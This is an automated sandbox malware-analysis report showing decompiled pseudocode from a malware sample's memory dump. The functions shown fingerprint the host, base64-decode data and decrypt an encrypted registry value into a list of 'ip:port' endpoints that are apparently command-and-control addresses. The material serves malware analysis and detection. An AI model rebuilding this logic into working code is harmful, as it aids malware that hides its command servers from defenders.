                                                                                                                                                                                                                                                                                          								_v912 = WideCharToMultiByte(0, 0, _v692, 0xffffffff, _a8, _a12, 0, 0);
                                                                                                                                                                                                                                                                                          								lstrcpynA(_a8,  &(_a8[1]), _v912 - 2);
                                                                                                                                                                                                                                                                                          								_v5 = 1;
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							__imp__CoTaskMemFree(_v692);
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				return _v5;
                                                                                                                                                                                                                                                                                          			}





























                                                                                                                                                                                                                                                                                          0x04009d29
                                                                                                                                                                                                                                                                                          0x04009d31
                                                                                                                                                                                                                                                                                          0x04009d4b
                                                                                                                                                                                                                                                                                          0x04009d52
                                                                                                                                                                                                                                                                                          0x04009d59
                                                                                                                                                                                                                                                                                          0x04009d63
                                                                                                                                                                                                                                                                                          0x04009d6a
                                                                                                                                                                                                                                                                                          0x04009d74
                                                                                                                                                                                                                                                                                          0x04009d7b
                                                                                                                                                                                                                                                                                          0x04009d88
                                                                                                                                                                                                                                                                                          0x04009da2
                                                                                                                                                                                                                                                                                          0x04009da8
                                                                                                                                                                                                                                                                                          0x04009ddd
                                                                                                                                                                                                                                                                                          0x04009de5
                                                                                                                                                                                                                                                                                          0x04009deb
                                                                                                                                                                                                                                                                                          0x04009e03
                                                                                                                                                                                                                                                                                          0x04009e0b
                                                                                                                                                                                                                                                                                          0x04009e28
                                                                                                                                                                                                                                                                                          0x04009e32
                                                                                                                                                                                                                                                                                          0x04009e34
                                                                                                                                                                                                                                                                                          0x04009e4f
                                                                                                                                                                                                                                                                                          0x04009e73
                                                                                                                                                                                                                                                                                          0x04009e49
                                                                                                                                                                                                                                                                                          0x04009e49
                                                                                                                                                                                                                                                                                          0x04009e4f
                                                                                                                                                                                                                                                                                          0x04009e81
                                                                                                                                                                                                                                                                                          0x04009e87
                                                                                                                                                                                                                                                                                          0x04009ea2
                                                                                                                                                                                                                                                                                          0x04009ecf
                                                                                                                                                                                                                                                                                          0x04009ee4
                                                                                                                                                                                                                                                                                          0x04009e9c
                                                                                                                                                                                                                                                                                          0x04009e9c
                                                                                                                                                                                                                                                                                          0x04009eec
                                                                                                                                                                                                                                                                                          0x04009ef7
                                                                                                                                                                                                                                                                                          0x04009efd
                                                                                                                                                                                                                                                                                          0x04009f0a
                                                                                                                                                                                                                                                                                          0x04009f2b
                                                                                                                                                                                                                                                                                          0x04009f46
                                                                                                                                                                                                                                                                                          0x04009f4c
                                                                                                                                                                                                                                                                                          0x04009f4c
                                                                                                                                                                                                                                                                                          0x04009f57
                                                                                                                                                                                                                                                                                          0x04009f57
                                                                                                                                                                                                                                                                                          0x04009de5
                                                                                                                                                                                                                                                                                          0x04009da2
                                                                                                                                                                                                                                                                                          0x04009f63

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • GetSystemDirectoryA.KERNEL32 ref: 04009D9A
                                                                                                                                                                                                                                                                                          • GetVolumeInformationA.KERNEL32(?,?,00000103,00000000,00000000,00000000,?,00000063), ref: 04009DDD
                                                                                                                                                                                                                                                                                            • Part of subcall function 04009F70: GetAdaptersInfo.IPHLPAPI(00000000,04009E2D), ref: 04009FEB
                                                                                                                                                                                                                                                                                          • StringFromCLSID.OLE32(00000020,?), ref: 04009EF7
                                                                                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,0019660D,00000000,00000000,00000000), ref: 04009F25
                                                                                                                                                                                                                                                                                          • lstrcpynA.KERNEL32(0019660D,0019660C,?), ref: 04009F46
                                                                                                                                                                                                                                                                                          • CoTaskMemFree.OLE32(?), ref: 04009F57
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000001.00000002.727052256.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.727020045.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.727132204.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.727164191.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_4000000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: AdaptersByteCharDirectoryFreeFromInfoInformationMultiStringSystemTaskVolumeWidelstrcpyn
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 2697952880-3916222277
                                                                                                                                                                                                                                                                                          • Opcode ID: 019f01e5d103752babcd14cd7d8c94bd9c738822c2c1009ff713c67dab5555ec
                                                                                                                                                                                                                                                                                          • Instruction ID: 5e89223982a4db5088977870fe710af53f8bde251be69ccbe6f0708d183867dd
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 019f01e5d103752babcd14cd7d8c94bd9c738822c2c1009ff713c67dab5555ec
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 695139B0A043189FEB25CF50CC88BEAB7B9BB44304F14C2D9E5096A281DB74AB84CF51
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                          			E04001390(signed int __eax, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                                                                                                                                                                                                          				signed char* _v8;
                                                                                                                                                                                                                                                                                          				char _v12;
                                                                                                                                                                                                                                                                                          				char _v16;
                                                                                                                                                                                                                                                                                          				intOrPtr _v20;
                                                                                                                                                                                                                                                                                          				long _v24;
                                                                                                                                                                                                                                                                                          				void* _v28;
                                                                                                                                                                                                                                                                                          				long _v32;
                                                                                                                                                                                                                                                                                          				signed int _t52;
                                                                                                                                                                                                                                                                                          				signed int _t57;
                                                                                                                                                                                                                                                                                          				intOrPtr _t64;
                                                                                                                                                                                                                                                                                          				void* _t76;
                                                                                                                                                                                                                                                                                          				void* _t103;
                                                                                                                                                                                                                                                                                          				void* _t104;
                                                                                                                                                                                                                                                                                          				void* _t106;
                                                                                                                                                                                                                                                                                          				void* _t107;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_t52 = __eax;
                                                                                                                                                                                                                                                                                          				if(_a4 == 0 || _a8 == 0 || _a4 == 0 || _a16 == 0) {
                                                                                                                                                                                                                                                                                          					return _t52 | 0xffffffff;
                                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                                          					_v24 = 0;
                                                                                                                                                                                                                                                                                          					_t57 = RtlAllocateHeap(GetProcessHeap(), 8, _a8 + 5); // executed
                                                                                                                                                                                                                                                                                          					_v28 = _t57;
                                                                                                                                                                                                                                                                                          					if(_v28 != 0) {
                                                                                                                                                                                                                                                                                          						E04007B70(_v28, _a4, _a8);
                                                                                                                                                                                                                                                                                          						E04007B70(_v28 + _a8, "====", 4);
                                                                                                                                                                                                                                                                                          						_t106 = _t104 + 0x18;
                                                                                                                                                                                                                                                                                          						_v8 = _v28;
                                                                                                                                                                                                                                                                                          						_v20 = 3;
                                                                                                                                                                                                                                                                                          						while(_v20 == 3) {
                                                                                                                                                                                                                                                                                          							_v32 = 0;
                                                                                                                                                                                                                                                                                          							while(_v32 < 4) {
                                                                                                                                                                                                                                                                                          								while( *_v8 != 0x3d) {
                                                                                                                                                                                                                                                                                          									_t76 = E04001500( *_v8 & 0x000000ff);
                                                                                                                                                                                                                                                                                          									_t106 = _t106 + 4;
                                                                                                                                                                                                                                                                                          									if(_t76 >= 0) {
                                                                                                                                                                                                                                                                                          										break;
                                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                                          									_v8 =  &(_v8[1]);
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          								 *((char*)(_t103 + _v32 - 0xc)) =  *_v8;
                                                                                                                                                                                                                                                                                          								_v8 =  &(_v8[1]);
                                                                                                                                                                                                                                                                                          								_v32 = _v32 + 1;
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							_t64 = E04001580( &_v16,  &_v12);
                                                                                                                                                                                                                                                                                          							_t107 = _t106 + 8;
                                                                                                                                                                                                                                                                                          							_v20 = _t64;
                                                                                                                                                                                                                                                                                          							if(_a16 >= _v20) {
                                                                                                                                                                                                                                                                                          								E04007B70(_a12,  &_v12, _v20);
                                                                                                                                                                                                                                                                                          								_t106 = _t107 + 0xc;
                                                                                                                                                                                                                                                                                          								_a12 = _a12 + _v20;
                                                                                                                                                                                                                                                                                          								_a16 = _a16 - _v20;
                                                                                                                                                                                                                                                                                          								_v24 = _v24 + _v20;
                                                                                                                                                                                                                                                                                          								continue;
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							return HeapFree(GetProcessHeap(), 0, _v28) | 0xffffffff;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						RtlFreeHeap(GetProcessHeap(), 0, _v28); // executed
                                                                                                                                                                                                                                                                                          						return _v24;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					return _t57 | 0xffffffff;
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          			}


















                                                                                                                                                                                                                                                                                          0x04001390
                                                                                                                                                                                                                                                                                          0x0400139a
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x040013b6
                                                                                                                                                                                                                                                                                          0x040013b6
                                                                                                                                                                                                                                                                                          0x040013cd
                                                                                                                                                                                                                                                                                          0x040013d3
                                                                                                                                                                                                                                                                                          0x040013da
                                                                                                                                                                                                                                                                                          0x040013f0
                                                                                                                                                                                                                                                                                          0x04001406
                                                                                                                                                                                                                                                                                          0x0400140b
                                                                                                                                                                                                                                                                                          0x04001411
                                                                                                                                                                                                                                                                                          0x04001414
                                                                                                                                                                                                                                                                                          0x0400141b
                                                                                                                                                                                                                                                                                          0x04001425
                                                                                                                                                                                                                                                                                          0x04001437
                                                                                                                                                                                                                                                                                          0x0400143d
                                                                                                                                                                                                                                                                                          0x0400144f
                                                                                                                                                                                                                                                                                          0x04001454
                                                                                                                                                                                                                                                                                          0x04001459
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x04001461
                                                                                                                                                                                                                                                                                          0x04001461
                                                                                                                                                                                                                                                                                          0x0400146e
                                                                                                                                                                                                                                                                                          0x04001478
                                                                                                                                                                                                                                                                                          0x04001434
                                                                                                                                                                                                                                                                                          0x04001434
                                                                                                                                                                                                                                                                                          0x04001485
                                                                                                                                                                                                                                                                                          0x0400148a
                                                                                                                                                                                                                                                                                          0x0400148d
                                                                                                                                                                                                                                                                                          0x04001496
                                                                                                                                                                                                                                                                                          0x040014bc
                                                                                                                                                                                                                                                                                          0x040014c1
                                                                                                                                                                                                                                                                                          0x040014ca
                                                                                                                                                                                                                                                                                          0x040014d3
                                                                                                                                                                                                                                                                                          0x040014dc
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x040014dc
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x040014ab
                                                                                                                                                                                                                                                                                          0x040014f1
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x040014f7
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x040013dc

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000008,-00000005), ref: 040013C6
                                                                                                                                                                                                                                                                                          • RtlAllocateHeap.NTDLL(00000000), ref: 040013CD
                                                                                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0400149E
                                                                                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000), ref: 040014A5
                                                                                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 040014EA
                                                                                                                                                                                                                                                                                          • RtlFreeHeap.NTDLL(00000000), ref: 040014F1
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000001.00000002.727052256.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.727020045.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.727132204.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.727164191.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_4000000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Heap$Process$Free$Allocate
                                                                                                                                                                                                                                                                                          • String ID: ====
                                                                                                                                                                                                                                                                                          • API String ID: 168621272-1026985228
                                                                                                                                                                                                                                                                                          • Opcode ID: cc6d638cfefe3820553d32bbcecc0cddb825681ad85667f70979d716b4f01239
                                                                                                                                                                                                                                                                                          • Instruction ID: c6e28297ba35799b7f22f7dab3aca0fae7ec72587fc4187f79a8e8c8e7655232
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cc6d638cfefe3820553d32bbcecc0cddb825681ad85667f70979d716b4f01239
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F7414CB5D04209EBEB04DFA4C884BEE7BB5FF44309F108619E515BB2D0D735AA45CB92
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 96%
                                                                                                                                                                                                                                                                                          			E04007970(intOrPtr* _a4) {
                                                                                                                                                                                                                                                                                          				long _v8;
                                                                                                                                                                                                                                                                                          				void* _v12;
                                                                                                                                                                                                                                                                                          				int _v16;
                                                                                                                                                                                                                                                                                          				long _v20;
                                                                                                                                                                                                                                                                                          				intOrPtr _v24;
                                                                                                                                                                                                                                                                                          				signed int _v28;
                                                                                                                                                                                                                                                                                          				intOrPtr _v32;
                                                                                                                                                                                                                                                                                          				signed int _v36;
                                                                                                                                                                                                                                                                                          				void* _v40;
                                                                                                                                                                                                                                                                                          				char _v44;
                                                                                                                                                                                                                                                                                          				signed int _v48;
                                                                                                                                                                                                                                                                                          				intOrPtr _v52;
                                                                                                                                                                                                                                                                                          				void* _t50;
                                                                                                                                                                                                                                                                                          				intOrPtr _t52;
                                                                                                                                                                                                                                                                                          				void* _t58;
                                                                                                                                                                                                                                                                                          				intOrPtr _t64;
                                                                                                                                                                                                                                                                                          				intOrPtr _t72;
                                                                                                                                                                                                                                                                                          				intOrPtr _t83;
                                                                                                                                                                                                                                                                                          				void* _t96;
                                                                                                                                                                                                                                                                                          				void* _t97;
                                                                                                                                                                                                                                                                                          				void* _t98;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_v8 = 0;
                                                                                                                                                                                                                                                                                          				if(_a4 != 0) {
                                                                                                                                                                                                                                                                                          					_v16 = 0x8c;
                                                                                                                                                                                                                                                                                          					_v20 = 0x75bc;
                                                                                                                                                                                                                                                                                          					_t50 = VirtualAlloc(0, 0x75bc, 0x3000, 4); // executed
                                                                                                                                                                                                                                                                                          					_v12 = _t50;
                                                                                                                                                                                                                                                                                          					if(_v12 != 0) {
                                                                                                                                                                                                                                                                                          						_t72 =  *0x400e28c; // 0x4013f88
                                                                                                                                                                                                                                                                                          						_t83 =  *0x40118a0; // 0x4013b88
                                                                                                                                                                                                                                                                                          						_t52 = E0400A400(_t83, _t72, _v12, 0x75bc); // executed
                                                                                                                                                                                                                                                                                          						_t97 = _t96 + 0x10;
                                                                                                                                                                                                                                                                                          						_v24 = _t52;
                                                                                                                                                                                                                                                                                          						if(_v24 >= 0x92) {
                                                                                                                                                                                                                                                                                          							_v28 = _v24 - 0x8c;
                                                                                                                                                                                                                                                                                          							_t58 = E04008A70(_v12 + 0x8c,  &_v28, _v12, 0x8c, 0x40130e8, 0x254);
                                                                                                                                                                                                                                                                                          							_t98 = _t97 + 0x18;
                                                                                                                                                                                                                                                                                          							if(_t58 != 0) {
                                                                                                                                                                                                                                                                                          								_v32 = _v12 + 0x8c;
                                                                                                                                                                                                                                                                                          								_v36 = _v28 / 6;
                                                                                                                                                                                                                                                                                          								_v40 = VirtualAlloc(0, _v36 * 0x28, 0x3000, 4);
                                                                                                                                                                                                                                                                                          								if(_v40 != 0) {
                                                                                                                                                                                                                                                                                          									_v48 = 0;
                                                                                                                                                                                                                                                                                          									while(_v48 < _v36) {
                                                                                                                                                                                                                                                                                          										_t64 = E04007B70( &_v44, _v48 * 6 + _v32, 4);
                                                                                                                                                                                                                                                                                          										_push(_v44);
                                                                                                                                                                                                                                                                                          										L0400B1EC();
                                                                                                                                                                                                                                                                                          										_v52 = _t64;
                                                                                                                                                                                                                                                                                          										wnsprintfA(_v48 * 0x28 + _v40, 0x28, "%s:%u", _v52,  *(_v32 + 4 + _v48 * 6) & 0x0000ffff);
                                                                                                                                                                                                                                                                                          										_t98 = _t98 + 0x20;
                                                                                                                                                                                                                                                                                          										_v8 = _v8 + 1;
                                                                                                                                                                                                                                                                                          										_v48 = _v48 + 1;
                                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                                          									 *_a4 = _v40;
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						VirtualFree(_v12, 0, 0x8000); // executed
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				return _v8;
                                                                                                                                                                                                                                                                                          			}
























                                                                                                                                                                                                                                                                                          0x04007976
                                                                                                                                                                                                                                                                                          0x04007981
                                                                                                                                                                                                                                                                                          0x04007987
                                                                                                                                                                                                                                                                                          0x0400798e
                                                                                                                                                                                                                                                                                          0x040079a3
                                                                                                                                                                                                                                                                                          0x040079a9
                                                                                                                                                                                                                                                                                          0x040079b0
                                                                                                                                                                                                                                                                                          0x040079bf
                                                                                                                                                                                                                                                                                          0x040079c6
                                                                                                                                                                                                                                                                                          0x040079cd
                                                                                                                                                                                                                                                                                          0x040079d2
                                                                                                                                                                                                                                                                                          0x040079d5
                                                                                                                                                                                                                                                                                          0x040079df
                                                                                                                                                                                                                                                                                          0x040079ed
                                                                                                                                                                                                                                                                                          0x04007a10
                                                                                                                                                                                                                                                                                          0x04007a15
                                                                                                                                                                                                                                                                                          0x04007a1a
                                                                                                                                                                                                                                                                                          0x04007a29
                                                                                                                                                                                                                                                                                          0x04007a38
                                                                                                                                                                                                                                                                                          0x04007a51
                                                                                                                                                                                                                                                                                          0x04007a58
                                                                                                                                                                                                                                                                                          0x04007a5a
                                                                                                                                                                                                                                                                                          0x04007a6c
                                                                                                                                                                                                                                                                                          0x04007a84
                                                                                                                                                                                                                                                                                          0x04007a8f
                                                                                                                                                                                                                                                                                          0x04007a90
                                                                                                                                                                                                                                                                                          0x04007a95
                                                                                                                                                                                                                                                                                          0x04007abc
                                                                                                                                                                                                                                                                                          0x04007ac2
                                                                                                                                                                                                                                                                                          0x04007acb
                                                                                                                                                                                                                                                                                          0x04007a69
                                                                                                                                                                                                                                                                                          0x04007a69
                                                                                                                                                                                                                                                                                          0x04007ad6
                                                                                                                                                                                                                                                                                          0x04007ad6
                                                                                                                                                                                                                                                                                          0x04007a58
                                                                                                                                                                                                                                                                                          0x04007a1a
                                                                                                                                                                                                                                                                                          0x04007ae3
                                                                                                                                                                                                                                                                                          0x04007ae3
                                                                                                                                                                                                                                                                                          0x040079b0
                                                                                                                                                                                                                                                                                          0x04007aef

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,000075BC,00003000,00000004), ref: 040079A3
                                                                                                                                                                                                                                                                                            • Part of subcall function 0400A400: RegOpenKeyExA.KERNEL32(80000001,80000001,00000000,000F003F,00000000), ref: 0400A45C
                                                                                                                                                                                                                                                                                            • Part of subcall function 0400A400: RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 0400A480
                                                                                                                                                                                                                                                                                            • Part of subcall function 0400A400: RegCloseKey.KERNEL32(00000000), ref: 0400A494
                                                                                                                                                                                                                                                                                          • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 04007AE3
                                                                                                                                                                                                                                                                                            • Part of subcall function 04008A70: CryptAcquireContextA.ADVAPI32(00000000,0400C6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000), ref: 04008AD3
                                                                                                                                                                                                                                                                                            • Part of subcall function 04008A70: GetLastError.KERNEL32 ref: 04008ADD
                                                                                                                                                                                                                                                                                            • Part of subcall function 04008A70: CryptAcquireContextA.ADVAPI32(00000000,0400C6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008), ref: 04008B0C
                                                                                                                                                                                                                                                                                            • Part of subcall function 04008A70: CryptImportKey.ADVAPI32(00000000,00000000,?,00000000,00000001,00000000), ref: 04008B37
                                                                                                                                                                                                                                                                                            • Part of subcall function 04008A70: CryptImportKey.ADVAPI32(00000000,00000000,00000000,00000000,00000001,00000000), ref: 04008B5E
                                                                                                                                                                                                                                                                                            • Part of subcall function 04008A70: CryptDecrypt.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00000000), ref: 04008B7A
                                                                                                                                                                                                                                                                                            • Part of subcall function 04008A70: CryptDestroyKey.ADVAPI32(00000000), ref: 04008B87
                                                                                                                                                                                                                                                                                            • Part of subcall function 04008A70: CryptDestroyKey.ADVAPI32(00000000), ref: 04008B91
                                                                                                                                                                                                                                                                                            • Part of subcall function 04008A70: CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 04008B9D
                                                                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 04007A4B
                                                                                                                                                                                                                                                                                          • inet_ntoa.WS2_32(?), ref: 04007A90
                                                                                                                                                                                                                                                                                          • wnsprintfA.SHLWAPI ref: 04007ABC
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000001.00000002.727052256.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.727020045.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.727132204.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.727164191.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_4000000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Crypt$ContextVirtual$AcquireAllocDestroyImport$CloseDecryptErrorFreeLastOpenQueryReleaseValueinet_ntoawnsprintf
                                                                                                                                                                                                                                                                                          • String ID: %s:%u$Vatwyovatk
                                                                                                                                                                                                                                                                                          • API String ID: 1891311255-2484782420
                                                                                                                                                                                                                                                                                          • Opcode ID: 79f967d1a52c2aaee155b9d7bfa010675069804c64fe547678c39a65b43ec606
                                                                                                                                                                                                                                                                                          • Instruction ID: d327848a4ae889dd371e71d646ee9b038911c4fd72f1be7e57aa30bfb263aa34
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 79f967d1a52c2aaee155b9d7bfa010675069804c64fe547678c39a65b43ec606
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8C410FB5E04208EBFB04DF94C945BEEBBB5EB88705F14C159E6057B2C0D779AA40CB64
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                          			E04005E30(signed char _a4) {
                                                                                                                                                                                                                                                                                          				char* _v8;
                                                                                                                                                                                                                                                                                          				char _v9;
                                                                                                                                                                                                                                                                                          				void* _v16;
                                                                                                                                                                                                                                                                                          				void* _v20;
                                                                                                                                                                                                                                                                                          				char* _v24;
                                                                                                                                                                                                                                                                                          				int _v28;
                                                                                                                                                                                                                                                                                          				signed int _v29;
                                                                                                                                                                                                                                                                                          				int _v36;
                                                                                                                                                                                                                                                                                          				char _v68;
                                                                                                                                                                                                                                                                                          				int _v72;
                                                                                                                                                                                                                                                                                          				char* _t31;
                                                                                                                                                                                                                                                                                          				long _t33;
                                                                                                                                                                                                                                                                                          				long _t37;
                                                                                                                                                                                                                                                                                          				char* _t45;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_v9 = 0;
                                                                                                                                                                                                                                                                                          				_t31 =  *0x40118a0; // 0x4013b88
                                                                                                                                                                                                                                                                                          				_v8 = _t31;
                                                                                                                                                                                                                                                                                          				_t45 =  *0x4011894; // 0x4013fc4
                                                                                                                                                                                                                                                                                          				_v24 = _t45;
                                                                                                                                                                                                                                                                                          				_v16 = 0x80000001;
                                                                                                                                                                                                                                                                                          				if(( *0x401435a & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                                          					_v16 = 0x80000002;
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				_v20 = 0;
                                                                                                                                                                                                                                                                                          				_t33 = RegOpenKeyExA(_v16, _v8, 0, 0xf003f,  &_v20); // executed
                                                                                                                                                                                                                                                                                          				if(_t33 == 0) {
                                                                                                                                                                                                                                                                                          					_v36 = 0x20;
                                                                                                                                                                                                                                                                                          					_v28 = 0x20;
                                                                                                                                                                                                                                                                                          					_v29 = 0;
                                                                                                                                                                                                                                                                                          					_t37 = RegQueryValueExA(_v20, _v24, 0, 0,  &_v68,  &_v28); // executed
                                                                                                                                                                                                                                                                                          					if(_t37 == 0 && _v28 == 0x10) {
                                                                                                                                                                                                                                                                                          						_v29 = 1;
                                                                                                                                                                                                                                                                                          						if((_a4 & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                                          							RegDeleteValueA(_v20, _v24);
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					_t48 = _v29 & 0x000000ff;
                                                                                                                                                                                                                                                                                          					if((_v29 & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                                          						_v72 = 0x10;
                                                                                                                                                                                                                                                                                          						E04009BD0(_t48,  &_v68, 0x10);
                                                                                                                                                                                                                                                                                          						RegSetValueExA(_v20, _v24, 0, 3,  &_v68, 0x10);
                                                                                                                                                                                                                                                                                          						_v9 = 1;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					RegCloseKey(_v20); // executed
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				return _v9;
                                                                                                                                                                                                                                                                                          			}

















                                                                                                                                                                                                                                                                                          0x04005e36
                                                                                                                                                                                                                                                                                          0x04005e3a
                                                                                                                                                                                                                                                                                          0x04005e3f
                                                                                                                                                                                                                                                                                          0x04005e42
                                                                                                                                                                                                                                                                                          0x04005e48
                                                                                                                                                                                                                                                                                          0x04005e4b
                                                                                                                                                                                                                                                                                          0x04005e5b
                                                                                                                                                                                                                                                                                          0x04005e5d
                                                                                                                                                                                                                                                                                          0x04005e5d
                                                                                                                                                                                                                                                                                          0x04005e64
                                                                                                                                                                                                                                                                                          0x04005e7e
                                                                                                                                                                                                                                                                                          0x04005e86
                                                                                                                                                                                                                                                                                          0x04005e8c
                                                                                                                                                                                                                                                                                          0x04005e93
                                                                                                                                                                                                                                                                                          0x04005e9a
                                                                                                                                                                                                                                                                                          0x04005eb2
                                                                                                                                                                                                                                                                                          0x04005eba
                                                                                                                                                                                                                                                                                          0x04005ec2
                                                                                                                                                                                                                                                                                          0x04005ecc
                                                                                                                                                                                                                                                                                          0x04005ed6
                                                                                                                                                                                                                                                                                          0x04005ed6
                                                                                                                                                                                                                                                                                          0x04005ecc
                                                                                                                                                                                                                                                                                          0x04005edc
                                                                                                                                                                                                                                                                                          0x04005ee2
                                                                                                                                                                                                                                                                                          0x04005ee4
                                                                                                                                                                                                                                                                                          0x04005ef1
                                                                                                                                                                                                                                                                                          0x04005f0b
                                                                                                                                                                                                                                                                                          0x04005f11
                                                                                                                                                                                                                                                                                          0x04005f11
                                                                                                                                                                                                                                                                                          0x04005f19
                                                                                                                                                                                                                                                                                          0x04005f19
                                                                                                                                                                                                                                                                                          0x04005f25

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,000F003F,00000000), ref: 04005E7E
